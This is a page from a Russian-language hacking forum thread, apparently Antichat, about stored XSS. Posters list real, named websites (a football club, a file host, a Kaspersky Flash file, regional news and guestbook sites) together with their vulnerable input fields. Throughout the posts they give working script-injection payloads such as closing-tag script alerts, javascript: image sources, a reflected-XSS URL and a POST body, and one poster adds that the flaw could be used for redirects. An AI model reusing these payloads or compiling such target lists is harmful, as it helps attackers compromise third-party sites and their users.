Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

Page 17 of 26
  1. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    327
    Likes Received:
    129
    Reputations:
    54
    http://www.kazakh.ru/talk/mmess.phtml?idt=21316 Тут тоже самое, уязвимое поле коментария.
     
    #321 ZARO, 3 Aug 2009
  2. -JC-

    -JC- Member

    Joined:
    10 Mar 2009
    Messages:
    54
    Likes Received:
    18
    Reputations:
    11
    http://www.arsenal.com/ В поле поиска
    http://www.arsenal.com/login в поле Username
     
    #322 -JC-, 8 Aug 2009
  3. xTray

    xTray New Member

    Joined:
    28 Jan 2007
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    http://testskills.ru/ - в полях ввода имя,фамилия,очество,емаил
     
    #323 xTray, 12 Aug 2009
  4. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452

    активка, поле коммент ;)
    "/><script>alert(/xss/)</script>
     
    _________________________
    #324 Uex Urgent, 13 Aug 2009
    Last edited: 18 Aug 2009
    2 people like this.
  5. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    активка в гостевой сайта Мульфильмы

    <img src="javascript:alert()">





    Радио 20 (Активка)
    <img src="javascript:alert()">




    Сайт Макса Фадеева (Активка )
    "/><script>alert(/xss/)</script>






    активка в поле имя и фамилия
    "/><script>alert(/xss/)</script>
     
    _________________________
    #325 Uex Urgent, 18 Aug 2009
    Last edited: 18 Aug 2009
    7 people like this.
  6. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    активка

    Ваще никакого фильтра нет, пролазит любой скрипт можно так сказать, да плюс еще сообщения дублируются трижды
     
    _________________________
    #326 Uex Urgent, 19 Aug 2009
    Last edited: 19 Aug 2009
  7. W@r.N0i$e

    [email protected]$e Member

    Joined:
    2 Jun 2009
    Messages:
    54
    Likes Received:
    51
    Reputations:
    12
    http://www.bis.biysk.ru/index.phtml?/otzyv.phtml
    Уязвимое поле: Тема.
     
    #327 [email protected]$e, 21 Aug 2009
  8. Uex Urgent

    Uex Urgent Злостный Смайлик

    Joined:
    6 Feb 2009
    Messages:
    236
    Likes Received:
    463
    Reputations:
    452
    активка

    "/><script>alert(/xss/)</script>
     
    _________________________
    #328 Uex Urgent, 26 Aug 2009
  9. DFrost

    DFrost Member

    Joined:
    5 Jun 2009
    Messages:
    18
    Likes Received:
    23
    Reputations:
    0
    WWW.ZAYCEV.NET
    Активка в подписи(FIXED)
    P.S. в поиске пассивка осталась
     
    #329 DFrost, 26 Aug 2009
    Last edited: 2 Sep 2009
    2 people like this.
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Изволю себе запостить в этой теме Пассивную XSS на letitbit. Тему новую создавать не хочется, а сайт о огромный...

    Code:
    http://letitbit.net/tmpl/tmpl_frame_top.php?link="><script>alert()</script>
     
    #330 mailbrush, 2 Sep 2009
    4 people like this.
  11. cremator (c)

    cremator (c) Elder - Старейшина

    Joined:
    20 Jun 2008
    Messages:
    258
    Likes Received:
    72
    Reputations:
    0
    Code:
    [COLOR=Green]http://primkray.ru/sms/index.php[/COLOR]
    Active XSS in "Сообщение"

    Code:
    [COLOR=Green]http://primkray.ru/bazar/zn_fl/index.php?a=form&id=[/COLOR]
    Active XSS in "Сообщение"
     
    #331 cremator (c), 10 Sep 2009
    Last edited by a moderator: 10 Sep 2009
    1 person likes this.
  12. eLWAux

    eLWAux Elder - Старейшина

    Joined:
    15 Jun 2008
    Messages:
    860
    Likes Received:
    616
    Reputations:
    211
    активки и пасивки на укр@мейл сервисах
    http://uasc.org.ua/2009/09/ua-mail-xss/
     
    #332 eLWAux, 14 Sep 2009
    4 people like this.
  13. Epic wave

    Epic wave Member

    Joined:
    15 Mar 2009
    Messages:
    105
    Likes Received:
    72
    Reputations:
    -1
    http://www.nevesta-kino.ru/about/

    в каждом поле
     
    #333 Epic wave, 14 Sep 2009
    Last edited: 14 Sep 2009
  14. AKYLA

    AKYLA Elder - Старейшина

    Joined:
    29 Nov 2007
    Messages:
    108
    Likes Received:
    35
    Reputations:
    6
    http://www.kaspersky.com/downloads/flash/productlaunch.swf?productLaunch=javascript:alert(12345)
    Ну или просто редирект можно на нужную страницу сделать ))
     
    #334 AKYLA, 15 Sep 2009
    1 person likes this.
  15. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    rpgmaker.ru

    javascript:alert();
     
    #335 Ctacok, 15 Sep 2009
  16. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    #336 BlackSun, 15 Sep 2009
    3 people like this.
  17. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.teko.ca/board/topic.php?id=666
    Code:
    name=Guest&comments=<script>alert('ANTICHAT FOREVER')</script>&email=human
     
    #337 mailbrush, 16 Sep 2009
  18. BlackSun

    BlackSun Banned

    Joined:
    1 Apr 2007
    Messages:
    989
    Likes Received:
    1,168
    Reputations:
    446
    Народ, читайте первый пост!

     
    #338 BlackSun, 4 Oct 2009
    1 person likes this.
  19. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    ресурс:
    Code:
    http://rutop.org
    xss в поле коментарии:
    Code:
    http://rutop.org/kom.php?id=92
     
    #339 L I G A, 10 Oct 2009
    2 people like this.
  20. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    Code:
    www.kino-tv.com.ua
    http://www.kino-tv.com.ua/catalog.php?item=1828&filter=

    Уязвимость - Оставьте комментарий
    Code:
    "><script>alert('ggg')<%2Fscript>
     
    #340 [x60]unu, 12 Oct 2009
    6 people like this.
(You must log in or sign up to post here.)
Page 17 of 26
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.